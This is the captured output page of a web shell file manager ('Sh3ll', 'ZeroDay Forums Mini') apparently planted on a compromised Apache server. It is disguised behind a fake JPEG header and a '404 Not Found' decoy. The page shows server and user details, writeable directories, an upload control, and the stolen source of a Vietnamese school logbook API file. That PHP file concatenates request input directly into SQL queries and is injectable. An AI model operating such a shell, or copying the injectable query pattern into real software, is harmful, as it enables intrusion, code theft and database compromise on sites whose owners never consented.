����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/api-truyentranh/includes/post/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/api-truyentranh/includes/post/weeklylesson_post_new.php
<?php
global $DB;
$user_key = $CORE->input['user_key']??'';
if(empty($user_key)){
    $arr_res['status'] = 'Error';
    $arr_res['status_note'] = 'user_key không tìm thấy';
    echo jsonutf($arr_res);
    exit();
}
$r_user = $DB->fetch_row($DB->query("SELECT * FROM TB_USER WHERE USER_KEY='$user_key'"));
if(!$r_user) {
    $arr_res['status'] = 'Error';
    $arr_res['status_note'] = 'user_key không tìm thấy';
    echo jsonutf($arr_res);
    exit();
}
$user_id = $r_user['USER_ID'];
$r_teacher = $DB->fetch_row($DB->query("SELECT * FROM TB_TEACHER WHERE USER_ID='$user_id'"));
$v_teacher_id = $TEACHER_ID = $r_teacher['TEACHER_ID'];
$v_school_id = $r_teacher['SCHOOL_ID'];
$arr_res['user_id'] = $user_id;
$arr_res['teacher_id'] = $r_teacher['TEACHER_ID'];
$arr_res['teacher_fullname'] = showutf($r_teacher['TEACHER_REAL_NAME']);

$tiet_id=$CORE->input['lesson_id'];
$row_tiet = $DB->fetch_row($DB->query("SELECT * FROM TB_TIET WHERE TIET_ID='$tiet_id' AND TEACHER_ID='$TEACHER_ID'"));
if(!$row_tiet){
    $arr_res['status'] = 'Error';
    $arr_res['status_note'] = 'lesson_id không tìm thấy';
    echo jsonutf($arr_res);
    exit();
}
$lesson_title = textformatdb(trim($CORE->input['lesson_title']));
$lesson_note = textformatdb(trim($CORE->input['lesson_note']));
$tiet_ppct= textformatdb(trim($CORE->input['tiet_ppct']));
$lesson_rank = trim($CORE->input['lesson_rank']);
$dan_do_bao_bai = $lesson_comment = textformatdb(trim($CORE->input['dan_do_bao_bai']));
$link_bao_bai = trim($CORE->input['link_bao_bai'])??'';
$han_nop = trim($CORE->input['han_nop']);

$arr_update = array('LESSION_TITLE'=>$lesson_title,'NOTE'=>$lesson_note,'TIET_PPCT'=>$tiet_ppct,'RANK'=>$lesson_rank,'LAST_UPDATE_TIME'=>date('Y-m-d H:i:s'));
$DB->do_update('TB_TIET',$arr_update," WHERE TIET_ID='$tiet_id' AND TEACHER_ID='$TEACHER_ID' ");
if(!empty($lesson_comment)){
    if($han_nop!=''){
        if(!check_date_input($han_nop)){
            $arr_res['status'] = 'Error';
            $arr_res['status_note'] = 'han_nop có dạng dd-mm-yyyy';
            echo jsonutf($arr_res);
            exit();
        }
        $han_nop_db = date('Y-m-d',strtotime($han_nop));
    }else{
        $han_nop_db = '0000-00-00';
    }
    $row_check2 = $DB->fetch_row($DB->query("SELECT * FROM TB_TIET_COMMENT WHERE TIET_ID='$tiet_id' "));
    if(!$row_check2){
        $arr_insert_comment = array('TIET_ID'=>$tiet_id,'TIET_COMMENT_CONTENT'=>$lesson_comment,'TIET_HAN_NOP'=>$han_nop_db,'TIET_LINK'=>$link_bao_bai);
        $DB->do_insert('TB_TIET_COMMENT',$arr_insert_comment);
    }else{
        $arr_update_comment = array('TIET_COMMENT_CONTENT'=>$lesson_comment,'TIET_HAN_NOP'=>$han_nop_db,'TIET_LINK'=>$link_bao_bai);
        $DB->do_update('TB_TIET_COMMENT',$arr_update_comment, " WHERE TIET_ID='$tiet_id' ");
    }
}
$arr_allow_file_type = array("jpg","jpeg","gif","mid","mp3","mp4","png","tif","doc","docx","rar","zip","pdf","rtf","txt","xls","xlsx","pptx","ppt");
$file_bai = '';
$v_file_name = $file_type = '';
$file_size = 0;
if(isset($_FILES['file_bao_bai']) && $_FILES["file_bao_bai"]["name"]!=''){
    $file = $_FILES['file_bao_bai'];
    $folder = 'bao_bai';
    $link_img_upload = safeupload($file,$folder);
    if(!is_numeric($link_img_upload)){
        //$link_img = $INFO['app_url'].'/'.$link_img_upload;
        $link_img = $link_img_upload;
    }else{
        switch($link_img_upload){
            case 1:
                $arr_res['status'] = 'Error';
                $arr_res['status_note'] = 'file_bao_bai cần nhỏ hơn 10MB';
                echo jsonutf($arr_res);
                exit();
                break;
            case 2:
                $arr_res['status'] = 'Error';
                $arr_res['status_note'] = 'file_bao_bai không đúng định dạng';
                echo jsonutf($arr_res);
                exit();
                break;
            case 3:
                $arr_res['status'] = 'Error';
                $arr_res['status_note'] = 'Máy chủ đầy dung lượng, không thể upload';
                echo jsonutf($arr_res);
                exit();
                break;
            default:
                //$DOCUMENT_ROOT = str_replace('/public','',$_SERVER['DOCUMENT_ROOT']);
                $DOCUMENT_ROOT = $_SERVER['DOCUMENT_ROOT'];
                $arr_res['status'] = 'Error';
                $arr_res['status_note'] = $DOCUMENT_ROOT;
                echo jsonutf($arr_res);
                exit();
                break;
        }
    }
    $file_type = $_FILES["file_lesson"]["type"];
    $file_size = $_FILES["file_lesson"]["size"];
    $v_file_name = $_FILES["file_lesson"]["name"];
    $file_bai = $link_img;
}
if(!empty($file_bai)){
    if($row_check2['TIET_COMMENT_FILE']!='' and file_exists($row_check2['TIET_COMMENT_FILE'])){
        unlink($row_check2['TIET_COMMENT_FILE']);
    }
    $arr_parse = splitUrl($file_bai);
    $TIET_DOMAIN = str_replace(array('https://','http://'),array('',''),$arr_parse['domain']);
    $file_bai = $arr_parse['remaining_path'];
    $file_bai = substr($file_bai, 1);
    $arr_update_comment_file = array('TIET_COMMENT_FILE'=>$file_bai,'TIET_DOMAIN'=>$TIET_DOMAIN);
    $DB->do_update('TB_TIET_COMMENT',$arr_update_comment_file, " WHERE TIET_ID='$tiet_id' ");
    $arr_res['file_bao_bai'] = $file_bai;
    $arr_res['file_bao_bai_domain'] = $TIET_DOMAIN;
}
$arr_res['status'] = 'Success';
$arr_res['status_note'] = 'Đã cập nhật sổ đầu bài';
$arr_res['lesson_id'] = $tiet_id;
$arr_res['lesson_title'] = html_entity_decode($lesson_title);
$arr_res['dan_do_bao_bai'] = html_entity_decode($lesson_comment);

echo jsonutf($arr_res);
exit();
/*$arr_insert_tiet = array('CLASS_ID'=>$v_tkb_CLASS_ID,'ROOM_ID'=>$v_tkb_ROOM_ID,'SCHOOL_ID'=>$v_school_id,'SUBJECT_ID'=>$v_tkb_SUBJECT_ID,'TIET_DATE'=>$v_tiet_date,'TIET_NUM'=>$v_tkb_TIET_NUM,'TEACHER_ID'=>$v_teacher_id,'RANK'=>0,'LESSION_TITLE'=>'','NOTE'=>'','LAST_UPDATE_TIME'=>date('Y-m-d H:i:s'),'TIET_PPCT'=>'','TIET_STATUS'=>$v_tiet_status,'TIET_ONTAP'=>0,'TIET_DATINHLUONG'=>0);
$DB->do_insert('TB_TIET',$arr_insert_tiet);*/
function splitUrl($url) {
    $parsedUrl = parse_url($url);
    $domain = '';
    $remainingPath = '';

    if (isset($parsedUrl['host'])) {
        $domain = $parsedUrl['scheme'] . '://' . $parsedUrl['host'];
        $remainingPath = isset($parsedUrl['path']) ? $parsedUrl['path'] : '';
        if (isset($parsedUrl['query'])) {
            $remainingPath .= '?' . $parsedUrl['query'];
        }
        if (isset($parsedUrl['fragment'])) {
            $remainingPath .= '#' . $parsedUrl['fragment'];
        }
    } elseif (isset($parsedUrl['path'])) {
        // Handle cases where the URL might just be a path
        $parts = explode('/', $parsedUrl['path'], 2);
        if (!empty($parts[0])) {
            $domain = $parts[0];
            $remainingPath = isset($parts[1]) ? '/' . $parts[1] : '';
        }
    }

    return array('domain' => $domain, 'remaining_path' => $remainingPath);
}
?>

ZeroDay Forums Mini